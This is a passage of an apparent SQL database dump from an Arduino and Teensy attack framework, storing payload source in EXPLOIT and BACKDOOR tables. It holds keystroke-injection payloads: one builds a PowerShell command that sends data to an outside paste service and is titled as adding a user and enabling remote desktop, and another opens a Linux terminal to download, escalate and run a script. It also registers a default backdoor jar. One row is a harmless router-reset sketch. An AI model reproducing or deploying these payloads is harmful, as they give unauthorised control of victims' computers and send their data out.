\"http://tny.cz/api/create.xml\" \"paste=$pv&title=$pn&is_code=0&is_private=1&authenticate=$user`:$hash\" >> %temp%\\");\u000d    Keyboard.print(filename);\u000d    Keyboard.println(".ps1");\u000d\u000d}\u000d','2013-07-18 00:00:00.000000','Keyboard add a user and enable DRP (windows)','TEENSY')
INSERT INTO EXPLOIT VALUES(8,'Matias Nahuel Heredia','/*\u000aThis tool is used to reset the router \u000ain case you don''t have internet\u000aConect a 5v relay in the port 5\u000aand then conect the NC contact to the router\u000a\u000ayou need the ICMPPing.h library\u000adownload from \u000ahttp://www.blake-foster.com/projects/ICMPPing.zip\u000a\u000aAutor:Matias Heredia\u000a */\u000a\u000a#include <SPI.h>         \u000a#include <Ethernet.h>\u000a#include <ICMPPing.h>\u000a\u000abyte mac[] = {0xDE, 0xAD, 0xBE, 0xEF, 0xFE, 0xED}; // max address for ethernet shield\u000abyte ip[] = {<!--ipaddethernet-->}; // ip address for ethernet shield\u000abyte pingAddr[] = {<!--ipaddping-->}; // ip address to ping\u000a\u000aSOCKET pingSocket = 0;\u000a\u000achar buffer [256];\u000a\u000avoid setup() \u000a{\u000a\u000a  Ethernet.begin(mac, ip);\u000a  Serial.begin(9600);\u000a  pinMode(5, OUTPUT);\u000a  digitalWrite(5, LOW);\u000a\u000a}\u000aint cont = 0;\u000avoid loop()\u000a{\u000a  ICMPPing ping(pingSocket);\u000a  \u000aint i = ping(4, pingAddr, buffer);\u000a\u000a    if(i== 1)\u000a    {\u000a    Serial.println("internet connected");\u000a    }\u000a    else\u000a    {\u000a     Serial.println("no connnected");\u000a      digitalWrite(5, HIGH);\u000a      delay(5000);\u000a      digitalWrite(5, LOW);\u000a    }\u000a  \u000a  delay(500);\u000a}\u000a','2013-08-17 20:16:36.259000','Reeboot the router if dont have internet','UNO')
INSERT INTO EXPLOIT VALUES(9,'Matias Nahuel Heredia','/*\u000a  This payload Execute a script in a linux\u000a  you need to load this program\u000a  one ARDUINO LEONARDO  \u000a */\u000a\u000a\u000a// change this to match your platform:\u000a\u000avoid setup() {\u000a  // make pin 2 an input and turn on the \u000a  // pullup resistor so it goes high unless\u000a  // connected to ground:\u000a  pinMode(2, INPUT_PULLUP);\u000a  Keyboard.begin();\u000a}\u000a\u000avoid loop() {\u000a  int slash = 38;\u000a/*Execute the terminalk\u000a*/\u000a  Keyboard.press(KEY_LEFT_ALT);\u000a  Keyboard.press(KEY_F2);\u000a  delay(200);\u000a  Keyboard.releaseAll();\u000a  delay(500);\u000a  Keyboard.write(''k'');\u000a  delay(500);\u000a  Keyboard.println("onsole");\u000a  delay(5000);\u000a  /**\u000a  Download de script\u000a  */\u000a  <!-- keyboard download -->\u000a  delay(1000);\u000a  /*\u000a  privileges\u000a  */\u000a  <!-- keyboard privileges -->\u000a  delay(1000);\u000a  /*\u000a  Execute script\u000a  */\u000a  <!-- keyboard execute script -->\u000a  delay(1000);\u000a  \u000a  Keyboard.println("exit");\u000a  \u000a  delay(20000);\u000a\u000a}\u000a','2013-08-24 06:49:50.556000','Execute Script in linux','LEONARDO')
INSERT INTO DESCRIPTION VALUES(1,'This tool is used to reset the router \u000ain case you don''t have internet\u000aConect a 5v relay in the port 5\u000aand then conect the NC contact to the router\u000acompatible with \u000aArduino UNO DUEMILANOVE AND LEONARDO\u000a','ENGLISH',8,8)
INSERT INTO DESCRIPTION VALUES(2,'esta herramienta de ARDUINO\u000aSirve para reiniciar el router\u000aen caso que no tengas internet\u000aConecte un rele de 5 volts en el puerto 5\u000ay conecte el contacto NC (normal cerrado)\u000aa la alimentacion alterna del router.\u000acompatible con \u000aArduino UNO DUEMILANOVE AND LEONARDO\u000a','SPANISH',8,8)
INSERT INTO BACKDOOR VALUES(0,'','','ALL')
INSERT INTO BACKDOOR VALUES(1,'default backdoor for AHFramework search in documents "AHFbackdoor"','localhost:8080/files/backdoors/ahfbackdoor.jar','ALL')
